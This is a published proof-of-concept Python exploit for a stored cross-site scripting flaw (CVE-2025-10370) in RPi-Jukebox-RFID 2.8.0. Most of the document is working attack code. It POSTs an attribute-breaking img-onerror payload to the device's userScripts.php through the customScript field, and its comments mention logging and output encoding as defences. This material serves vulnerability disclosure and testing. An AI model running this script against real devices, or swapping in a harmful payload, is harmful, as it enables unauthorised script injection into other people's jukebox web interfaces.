RPi-Jukebox-RFID 2.8.0 – Stored Cross-Site Scripting (XSS)
Proof of Concept (PoC)
poc.py
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10370
#
# Description:
# This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
# The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
# of arbitrary JavaScript payloads.
import requests
# URL of the userScripts.php page on the device under test; the host part is a
# placeholder that must be replaced before running. This single endpoint is
# where a server-side access log or request filter would see the POST.
TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"

# Markup submitted in the form field. Per the header description, the page
# stores this value and renders it without adequate sanitization.
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

# Request headers: plain form encoding, Referer pointing at the page itself.
# No credentials or cookies are sent.
headers = dict(
    [
        ("User-Agent", "Mozilla/5.0"),
        ("Content-Type", "application/x-www-form-urlencoded"),
        ("Referer", TARGET),
    ]
)

# Form body: the one parameter the description names as unsanitized.
data = {"customScript": PAYLOAD}
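def send_exploit() -> None:
    """Send one POST to TARGET with the ``customScript`` form field set to PAYLOAD.

    Reads the module-level ``TARGET``, ``headers`` and ``data``. Prints the
    HTTP status code on success, or the transport error on failure, and
    returns nothing. The request carries no credentials, so on the server it
    shows up as a single form POST to userScripts.php; that request is the
    event a defender would log or alert on, and the server-side remedy is to
    encode the stored value when the page renders it.

    Raises:
        Nothing from the HTTP layer: ``requests.RequestException`` is caught
        and reported. Any other exception (for example a NameError from a
        missing constant) propagates instead of being reported as
        "Exploit failed", which the previous broad ``except Exception`` masked.
    """
    print(f"[+] Sending XSS payload to {TARGET}")
    try:
        # Only the network call can raise a request-level error; keep the
        # try body to that one line.
        r = requests.post(TARGET, headers=headers, data=data, timeout=5)
    except requests.RequestException as e:
        print(f"[-] Exploit failed: {e}")
        return
    print(f"[+] Payload sent. Status code: {r.status_code}")
    print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")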
if __name__ == "__main__":
    # Script entry point: only fires when run directly, not when imported.
    send_exploit()